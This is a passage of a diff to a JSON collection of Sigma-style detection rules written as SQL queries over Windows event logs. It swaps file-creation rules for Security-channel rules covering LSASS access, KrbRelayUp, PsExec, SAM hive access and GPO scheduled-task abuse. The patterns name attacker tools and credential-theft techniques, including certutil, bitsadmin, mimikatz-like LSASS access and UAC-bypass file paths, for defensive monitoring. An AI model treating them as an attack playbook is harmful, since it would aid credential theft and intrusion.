TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_uac_bypass_wmp.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Suspicious NTDS.DIT Creation", - "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", - "status": "test", - "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ntds_dit.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "NPPSpy Hacktool Usage", - "id": "cad1fe90-2406-44dc-bd03-59d0b58fe722", - "status": "test", - "description": "Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file", - "author": "Florian Roth (Nextron Systems)", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "status": "experimental", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.credential_access" ], "falsepositives": [ @@ -36910,1242 +36932,1220 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\NPPSpy.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NPPSpy.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_nppspy.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "New Outlook Macro Created", - "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "status": "test", - "description": "Detects the creation of a macro file for Outlook.", - "author": "@ScoubiMtl", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "User genuinely creates a VB Macro for their email" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_macro_creation.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "VsCode Powershell Profile Modification", - "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", - "status": "experimental", - "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD User Enumeration", + "id": "ab6bffca-beff-4baa-af11-6733f296d57a", + "status": "test", + "description": "Detects access to a domain user from a non-machine account", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Legitimate use of the profile by developers or administrators" + "Administrators configuring new users." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_vscode_powershell_profile.yml" + "filename": "win_security_ad_user_enumeration.yml" }, { - "title": "Rclone Config File Creation", - "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "title": "Tap Driver Installation - Security", + "id": "9c8afa4d-0022-48f0-9456-3712466f9701", "status": "test", - "description": "Detects Rclone config file being created", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ "attack.exfiltration", - "attack.t1567.002" + "attack.t1048" ], "falsepositives": [ - "Legitimate Rclone usage (rare)" + "Legitimate OpenVPN TAP insntallation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" ], - "filename": "file_event_win_rclone_exec_file.yml" + "filename": "win_security_tap_driver_installation.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - File", - "id": "41bb431f-56d8-4691-bb56-ed34e390906f", + "title": "Azure AD Health Monitoring Agent Registry Keys Access", + "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_msconfig_gui.yml" + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml" }, { - "title": "OneNote Attachment File Dropped In Suspicious Location", - "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", "status": "experimental", - "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage of \".one\" or \".onepkg\" files from those locations" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "Suspicious LNK Double Extension Files", - "id": "3215aa19-f060-4332-86d5-5602511f3ca8", - "status": "experimental", - "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Remote Service Activity via SVCCTL Named Pipe", + "id": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "status": "test", + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" ], "falsepositives": [ - "Users creating a shortcut on e.g. desktop" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'svcctl' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_lnk_double_extension.yml" + "filename": "win_security_svcctl_remote_service.yml" }, { - "title": "CrackMapExec File Creation Patterns", - "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", - "status": "experimental", - "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "status": "test", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" ], - "filename": "file_event_win_crackmapexec_patterns.yml" + "filename": "win_security_susp_net_recon_activity.yml" }, { - "title": "Suspicious Files in Default GPO Folder", - "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", - "status": "experimental", - "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", - "author": "elhoim", + "title": "SAM Registry Hive Handle Request", + "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "status": "test", + "description": "Detects handles requested to SAM registry hive", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.t1036.005", - "attack.defense_evasion" + "attack.discovery", + "attack.t1012", + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" ], - "filename": "file_event_win_susp_default_gpo_dir_write.yml" + "filename": "win_security_sam_registry_hive_handle_request.yml" }, { - "title": "Created Files by Microsoft Sync Center", - "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", - "status": "experimental", - "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", - "author": "elhoim", + "title": "Processes Accessing the Microphone and Webcam", + "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "status": "test", + "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.collection", + "attack.t1123" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_creation_by_mobsync.yml" + "filename": "win_security_camera_microphone_access.yml" }, { - "title": "Writing Local Admin Share", - "id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", - "status": "experimental", - "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", - "author": "frack113", + "title": "Persistence and Execution at Scale via GPO Scheduled Task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "status": "test", + "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", + "author": "Samir Bousseaden", "tags": [ + "attack.persistence", "attack.lateral_movement", - "attack.t1546.002" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\\\\\127.0.0%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" ], - "filename": "file_event_win_writing_local_admin_share.yml" + "filename": "win_security_gpo_scheduledtasks.yml" }, { - "title": "Suspicious Unattend.xml File Access", - "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "title": "WMI Persistence - Security", + "id": "f033f3f3-fd24-4995-97d8-a3bb17550a88", "status": "test", - "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", - "author": "frack113", + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Unknown (data set is too small; further testing needed)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_unattend_xml.yml" + "filename": "win_security_wmi_persistence.yml" }, { - "title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", - "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "title": "Addition of Domain Trusts", + "id": "0255a820-e564-4e40-af2b-6ac61160335c", + "status": "stable", + "description": "Addition of domains is seldom and should be verified for legitimacy.", + "author": "Thomas Patzke", "tags": [ "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Legitimate extension of domain structure" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_susp_add_domain_trust.yml" }, { - "title": "EVTX Created In Uncommon Location", - "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "title": "DiagTrackEoP Default Login Username", + "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", "status": "experimental", - "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", - "author": "D3F7A5105", + "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Admin activity", - "Backup activity" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 